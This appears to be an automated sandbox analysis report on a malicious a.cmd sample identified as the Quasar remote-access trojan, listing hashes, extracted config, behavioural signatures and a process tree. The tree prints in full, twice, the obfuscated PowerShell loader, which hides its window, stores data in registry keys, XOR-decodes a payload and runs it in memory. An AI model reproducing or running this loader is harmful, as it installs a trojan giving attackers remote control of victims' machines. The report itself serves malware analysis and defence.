Analysis
-
max time kernel
125s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system -
submitted
27-01-2025 23:02
Static task
static1
Behavioral task
behavioral1
Sample
a.cmd
Resource
win7-20240729-en
General
-
Target
a.cmd
-
Size
4.2MB
-
MD5
8e53db2a2b188768e4c23344be407467
-
SHA1
99dd0a15c342904542a6f2f0b9eed3a8c68aff68
-
SHA256
bfcdaed93c4c3605be7e800daac4299c4aa0df0218798cb64c2e2f01027989b2
-
SHA512
d7533b52cd188b2f62ea35c0c7774fb5e5d1c824ac96221d8d32a8a73a4f4e29f73ef5cfb968e76def16c2c32f4a35ea6422e3945b9b2d6eb21809ec18a389b6
-
SSDEEP
49152:bXMw/hbcpR1DHQJLN+Z/8AEUCm5feXp8dv6Hkn1uX+OiqK67KFly6TteW5SEVAAl:G
Malware Config
Extracted
quasar
"&Rj@���:@b;���
-
encryption_key
2F93492D384FEB71103635232F1BD56A2FEFBDE7
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/880-19-0x0000018EF9A70000-0x0000018EF9D9A000-memory.dmp family_quasar -
Blocklisted process makes network request 6 IoCs
flow pid Process 14 880 powershell.exe 21 880 powershell.exe 35 880 powershell.exe 39 880 powershell.exe 43 880 powershell.exe 44 880 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 880 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 880 powershell.exe 880 powershell.exe 880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 880 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 880 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2972 wrote to memory of 4752 2972 cmd.exe 86 PID 2972 wrote to memory of 4752 2972 cmd.exe 86 PID 4752 wrote to memory of 880 4752 conhost.exe 87 PID 4752 wrote to memory of 880 4752 conhost.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\a.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\conhost.execonhost --headless powershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 3626) - 
3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 1703) + 9351 
+ 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 
7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"2⤵
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -w hidden -c " $kdot_file='C:\Users\Admin\AppData\Local\Temp\a.cmd';${kd`OTvshygfkWqz} = .([char](((-14750 -Band 8742) + (-14750 -Bor 8742) + 7778 - 1699))+[char](((-3885 -Band 1045) + (-3885 -Bor 1045) - 4263 + 7204))+[char](((-8757 -Band 2626) + (-8757 -Bor 2626) + 2514 + 3733))+[char](((-1429 -Band 8075) + (-1429 -Bor 8075) + 2571 - 9172))+[char]((6708 - 8850 + 6131 - 3922))+[char]((20409 - 8699 - 2979 - 8620))+[char]((-225 - 6768 + 1896 + 5207))+[char]((14212 - 9087 - 3231 - 1778))+[char]((-3397 - 842 + 3123 + 1217))+[char](((1337 -Band 1487) + (1337 -Bor 1487) - 9959 + 7245))+[char]((-5146 - 574 + 1549 + 4287))) $kdOt_fILe -Raw;$KDOtbmoqtlKbef = ([SYsTem.TeXT.encODINg]::UTf8.gEtsTRiNG((72, 75, 67, 85, 58, 0x5c, 83, 111, 102, 116, 0x77, 97, 114, 101, 0x5c, 0x43, 0x68, 0x72, 111, 109, 0x65, 85, 112)) + [SYSTem.TEXT.ENCOdiNg]::UTf8.GetSTrinG((100, 97, 116, 0x65, 54, 105, 100, 111, 0x76)));if (-not (.([char]((15732 - 8133 + 432 - 7947))+[char]((19257 - 7156 - 9718 - 2282))+[char](((-2734 -Band 4889) + (-2734 -Bor 4889) + 5262 - 7302))+[char]((9588 - 4977 + 2556 - 7051))+[char]((-2864 - 4413 + 8947 - 1625))+[char](((-8636 -Band 1645) + (-8636 -Bor 1645) - 2511 + 9582))+[char](((-3354 -Band 4437) + (-3354 -Bor 4437) + 4248 - 5234))+[char](((892 -Band 9414) + (892 -Bor 9414) - 8468 - 1722))+[char](((-26991 -Band 8995) + (-26991 -Bor 8995) + 8283 + 9817))) $kdOtBMOQtlkbEF)) { .([char]((19517 - 7856 - 3443 - 8140))+[char]((9609 - 410 - 1625 - 7473))+[char](((-16567 -Band 8743) + (-16567 -Bor 8743) + 6179 + 1764))+[char]((8472 - 2614 - 5448 - 365))+[char](((-4905 -Band 5487) + (-4905 -Bor 5487) - 4009 + 3500))+[char]((17129 - 3580 - 5916 - 7517))+[char](((-334 -Band 987) + (-334 -Bor 987) - 4441 + 3889))+[char]((2919 - 3613 + 5539 - 4736))) -Path $KdOtBMOQtlKbEf -Force };1..3 | .([char]((5230 - 3406 + 4954 - 6741))) {.([char]((13622 - 3875 - 1701 - 7963))+[char](((-2220 -Band 3626) + (-2220 -Bor 
3626) - 3277 + 1972))+[char](((-6904 -Band 7564) + (-6904 -Bor 7564) - 2348 + 1804))+[char]((20570 - 3263 - 7526 - 9736))+[char]((14089 - 319 - 9486 - 4211))+[char]((5210 - 7844 + 7448 - 4698))+[char]((-3544 - 1541 + 1919 + 3267))+[char]((-10168 - 4861 + 8079 + 7059))+[char]((9248 - 8742 - 8501 + 8075))+[char]((10753 - 2291 - 5809 - 2539))+[char](((-5427 -Band 1323) + (-5427 -Bor 1323) + 7263 - 3048))+[char]((-695 - 1116 - 1123 + 3046))+[char](((-469 -Band 5539) + (-469 -Bor 5539) + 427 - 5396))+[char]((7556 - 8591 + 1345 - 196))+[char](((-13963 -Band 7760) + (-13963 -Bor 7760) - 2652 + 8971))+[char]((-285 - 373 + 735 + 44))) -Path $kDOtBmoqtLkBef -Name (([SYSTeM.TEXt.encoDING]::Utf8.GETsTRIng((0x4b, 0x44, 0x4f)) + [SysTEM.teXT.EncoDiNg]::utF8.GetstrIng(84))+$_) -Value (${KDOTvSh`YG`Fkwqz} | .([char]((281 - 716 - 6236 + 6754))+[char]((-880 - 5976 + 5141 + 1816))+[char](((750 -Band 9582) + (750 -Bor 9582) - 4152 - 6072))+[char]((-2961 - 3861 + 6110 + 813))+[char]((-508 - 1973 - 5327 + 7907))+[char]((1349 - 1221 + 6754 - 6766))+[char](((-16074 -Band 3997) + (-16074 -Bor 3997) + 5113 + 7009))+[char]((14865 - 4694 - 1572 - 8516))+[char]((7287 - 2419 - 2735 - 2017))+[char]((7818 - 929 - 7680 + 905))+[char]((9979 - 6348 - 6206 + 2680))+[char]((3538 - 9003 - 4373 + 9948))+[char](((-194 -Band 3911) + (-194 -Bor 3911) - 6575 + 2961))) -Pattern (([sySTEm.tExT.eNcodiNG]::uTf8.gETsTring((0x3a, 0x4b, 0x44, 0x4f)) + [sYsTeM.Text.ENcoDing]::utf8.GeTStRinG(84))+$_+([sYStEM.tExt.eNCoDinG]::UTF8.GeTstRING((58, 58)) + [syStEM.text.ENCOdIng]::UTF8.GetsTRinG((40, 46, 42, 41))))).matches.grOUPS[1].VAlue -Force};.([char]((-886 - 28 - 35 + 1032))+[char]((-761 - 4941 + 7273 - 1470))+[char]((7374 - 2058 + 2879 - 8079))+[char]((-5821 - 2214 + 8534 - 454))+[char](((-25447 -Band 9661) + (-25447 -Bor 9661) + 7083 + 8776))+[char](((-23455 -Band 9818) + (-23455 -Bor 9818) + 9297 + 4456))+[char](((-6428 -Band 4075) + (-6428 -Bor 4075) - 1283 + 3737))+[char](((-17878 -Band 1703) + (-17878 -Bor 
1703) + 9351 + 6933))+[char]((-4143 - 2770 + 7712 - 719))+[char]((17249 - 8050 - 3465 - 5620))+[char](((-10170 -Band 9313) + (-10170 -Bor 9313) + 4107 - 3139))+[char]((1901 - 785 - 9888 + 8884))+[char]((8557 - 3578 - 821 - 4057))+[char](((-5146 -Band 3353) + (-5146 -Bor 3353) + 4090 - 2183))+[char]((1171 - 1513 + 9247 - 8789))+[char]((2522 - 5998 + 912 + 2685))) -Path $KdoTbmOQtLKbeF -Name ([sySTEm.tEXt.ENCoDiNG]::utf8.getsTrIng((75, 68, 79)) + [sYSTEM.tExt.EncodINg]::utF8.gEtStrinG((84, 52))) -Value ([SYsTEM.TEXT.ENCoDing]::utF8.GeTstRInG((73, 106, 69, 67, 86, 56, 84, 80, 74, 88, 76, 107, 66, 55, 48, 117))) -Force;${k`DOtttPPe`ZraFi} = [SYSteM.TExT.eNCoDInG]::UTF8.gETBYteS((.([char]((-6530 - 7684 + 4771 + 9514))+[char]((3714 - 9852 - 3645 + 9884))+[char]((1324 - 5556 + 644 + 3704))+[char](((-4147 -Band 6727) + (-4147 -Bor 6727) - 8734 + 6199))+[char](((4845 -Band 3263) + (4845 -Bor 3263) - 1255 - 6780))+[char]((7917 - 6788 - 5342 + 4329))+[char](((6331 -Band 3572) + (6331 -Bor 3572) - 2969 - 6833))+[char]((21235 - 6007 - 7708 - 7411))+[char](((-795 -Band 3035) + (-795 -Bor 3035) + 4931 - 7091))+[char]((-3411 - 4619 + 7921 + 223))+[char]((13446 - 1786 - 4349 - 7200))+[char](((-1217 -Band 9401) + (-1217 -Bor 9401) - 540 - 7532))+[char]((-1221 - 1063 + 8983 - 6598))+[char](((2905 -Band 57) + (2905 -Bor 57) - 1658 - 1190))+[char]((21808 - 7648 - 5793 - 8251))+[char]((-1881 - 3141 + 9522 - 4379))) -Path $KDOtBmOqtLKBef KDOT4).kDot4);${`Kdot`XQjEw`Inego} = [CoNvert]::FrOMBaSE64StRiNg((.([char]((480 - 1598 + 6824 - 5635))+[char](((-8522 -Band 6253) + (-8522 -Bor 6253) + 5667 - 3297))+[char](((-20193 -Band 5067) + (-20193 -Bor 5067) + 7759 + 7483))+[char](((-17922 -Band 6310) + (-17922 -Bor 6310) + 4973 + 6684))+[char](((-10123 -Band 9428) + (-10123 -Bor 9428) + 1246 - 478))+[char](((-20709 -Band 5925) + (-20709 -Bor 5925) + 7895 + 7005))+[char]((-7490 - 5819 + 7058 + 6352))+[char]((14683 - 9715 - 5282 + 423))+[char](((-18847 -Band 9498) + (-18847 -Bor 9498) + 1791 + 
7638))+[char]((-7266 - 1582 - 445 + 9407))+[char]((6628 - 3923 + 2692 - 5286))+[char]((5109 - 9189 + 6227 - 2035))+[char]((8399 - 8486 - 5273 + 5461))+[char](((3539 -Band 4269) + (3539 -Bor 4269) - 8376 + 682))+[char]((11064 - 3164 - 6494 - 1290))+[char]((-6505 - 2289 + 5881 + 3034))) -Path $kdOTBMoqtLkBeF KDOT1).KdoT1);$KdOtbhBtrrrWvn = [BytE[]]::NeW(${`KDOtXqjeWine`G`O}.LeNGtH);for (${KDotZqravJjWvK}=0;${`K`DotzQrav`J`JWvk} -lt ${kdotXQJeWIneGO}.LenGth;${kd`OtzqravJ`Jwvk}++) {$KDotbHbtrrrwvn[${KdotzqravjjwvK}]=${K`DotxqjEWinego}[${KdotzqravjJwvK}] -bxor ${KdOtttPpe`ZraF`I}[${k`DotZ`Qravj`Jwvk} % ${`Kd`Ott`T`Ppezrafi}.LEngtH]};[SyStEM.rEfLECTion.ASsEmBlY]::LOaD($KDOtBhbtrrrwvn).EntRyPoInT.INVOkE($nULL,@(,[string[]]@()))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:880
-
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82